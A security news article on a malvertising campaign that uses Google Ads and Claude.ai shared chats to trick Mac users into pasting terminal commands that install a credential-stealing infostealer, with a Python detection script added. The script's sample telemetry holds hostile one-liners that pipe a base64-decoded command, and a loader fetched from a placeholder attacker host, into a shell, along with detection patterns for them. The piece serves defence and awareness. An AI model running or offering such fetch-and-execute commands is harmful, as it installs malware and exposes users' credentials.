Attackers abuse Claude.ai shared chats and Google Ads to push Mac malware

TL;DR:

  • Researchers have identified an active malvertising campaign abusing Google Ads and Claude.ai’s shared-chat feature to install macOS malware on users searching for “Claude mac download”.
  • Sponsored search results legitimately point to claude.ai, but inside the shared chats attackers have planted fake “Apple Support” installation guides that direct users to paste terminal commands that silently download malware.
  • Resultsense view: this is a new class of brand-impersonation attack where the destination URL is genuine and the malicious payload lives inside the AI provider’s own user-generated content surface — exactly the kind of attack vector UK SMEs and IT teams need to start training staff against.

Berk Albayrak, a security engineer at Trendyol Group, identified the first variant of the campaign, with BleepingComputer subsequently confirming a second variant running on entirely separate infrastructure but using an identical social-engineering approach.

How the attack works

A user searches Google for “Claude mac download”. A sponsored ad shows claude.ai as the destination — and that is genuinely where the click lands. The shared chat presents itself as an official “Claude Code on Mac” installation guide, attributed to “Apple Support”, and walks the user through opening Terminal and pasting a single command. That command silently downloads and runs malware.

The base64-encoded command in the shared chat decodes to instructions that retrieve an encoded shell script from attacker-controlled domains. The ‘loader.sh’ served by the second link consists of gzip-compressed shell instructions that are decompressed and run entirely in memory, leaving little obvious trace on disk. BleepingComputer observed the server delivering a uniquely obfuscated version of the payload on each request, a technique known as polymorphic delivery, which makes it harder for security tools to flag the download based on a known hash or signature.

Selective targeting and credential theft

The variant BleepingComputer examined begins by checking whether the machine has Russian or CIS-region keyboard input sources configured. If it does, the script exits and sends a quiet ‘cis_blocked’ status ping back to the attacker. Only machines that pass this check progress to the next stage, suggesting selective targeting. Before running the second-stage payload, the script collects the victim’s external IP address, hostname, OS version and keyboard locale and sends them to the attacker for profiling.

The second-stage payload runs through osascript, the command-line tool built into macOS for executing AppleScript, giving the attacker remote code execution without dropping a traditional binary. The variant identified by Albayrak harvests browser credentials, cookies and macOS Keychain contents and exfiltrates them to attacker infrastructure; Albayrak attributed this to the MacSync macOS infostealer.

A new shape of malvertising

This campaign flips the usual malvertising pattern. Previous BleepingComputer reporting documented Google ads using a legitimate-looking domain but landing visitors on a lookalike phishing site. Here, the destination URL is the real one: Anthropic’s actual claude.ai domain. The malicious instructions live inside Claude’s own shared-chat feature.

Earlier in 2026, similar campaigns targeted developers searching for Homebrew. Targeting Claude reaches a much wider audience, including non-technical users who are simply curious about AI and less likely to scrutinise terminal commands.

UK SME relevance

UK SMEs typically run a higher proportion of macOS endpoints than larger enterprises and have less coverage from managed endpoint detection. Three practical mitigations apply directly: tell staff to navigate to claude.ai directly rather than via sponsored search results; treat any instruction asking them to paste a terminal command with suspicion regardless of source; and review whether endpoint protection on macOS devices is configured to flag in-memory polymorphic payloads.
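As an added illustration of the detection side of that third mitigation (example code written for this summary, not from BleepingComputer or the researchers), the Python below runs a handful of rules over constructed process-execution telemetry shaped like the chain described above: a base64-decoded command piped into a shell from Terminal, a curl fetch of a gzip-compressed loader run in memory, and an osascript second stage. The telemetry format, rule weights and the attacker.example domain are assumptions.

```python
import re

SHELLS = ("sh", "bash", "zsh")

# Constructed process-execution telemetry, one event per line as "parent|child|cmdline",
# modelled on the staged chain the article describes (pasted base64 command, curl of a
# gzip-compressed loader run in memory, osascript second stage). Not from a real incident;
# attacker.example is a placeholder domain.
SAMPLE_EVENTS = """\
Terminal|sh|echo aGVsbG8= | base64 -d | sh
sh|sh|curl -fsSL https://attacker.example/loader.sh | gunzip | sh
sh|osascript|osascript -e 'do shell script "..."'
Terminal|brew|brew install node
Terminal|git|git clone https://github.com/example/repo
"""

# (name, regex over the command line, weight). macOS base64 accepts -D as well as -d.
RULES = [
    ("base64_decode_to_shell", r"base64\s+(-d|-D|--decode)\b.*\|\s*(sh|bash|zsh)\b", 40),
    ("remote_script_to_shell", r"\bcurl\b.*\|\s*(gunzip|gzip\s+-d|sh|bash|zsh)\b", 30),
    ("inline_gzip_in_memory", r"\|\s*(gunzip|gzip\s+-dc?)\s*\|\s*(sh|bash|zsh)\b", 20),
    ("osascript_stage", r"^osascript\b", 25),
]


def score_event(parent, child, cmdline):
    """Return (score, matched rule names) for a single process event."""
    hits = [name for name, pat, _ in RULES if re.search(pat, cmdline)]
    score = sum(w for name, _, w in RULES if name in hits)
    # The campaign relies on the victim pasting into Terminal.app, so a shell launched
    # from the interactive terminal that already matched a rule weighs more.
    if parent == "Terminal" and child in SHELLS and hits:
        score += 10
    # osascript spawned by a shell, rather than by an app, is the second-stage pattern here.
    if parent in SHELLS and child == "osascript" and hits:
        score += 10
    return score, hits


def detect(telemetry=SAMPLE_EVENTS, threshold=30):
    """Run every rule over the telemetry and return (child, score, hits) at or above threshold."""
    alerts = []
    for line in telemetry.strip().splitlines():
        parent, child, cmdline = line.split("|", 2)
        score, hits = score_event(parent, child, cmdline)
        if score >= threshold:
            alerts.append((child, score, hits))
    return alerts
```

Against real EDR exports the same rules apply to the process command line field; the weights are a starting point to tune against your own baseline of legitimate curl and osascript use.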

Looking forward

Expect more attacks of this shape against other AI providers whose products include user-generated content shared via official domains. BleepingComputer reached out to Anthropic and Google for comment ahead of publication; the medium-term fix may need to come from how Claude.ai shared chats handle content that contains executable terminal commands.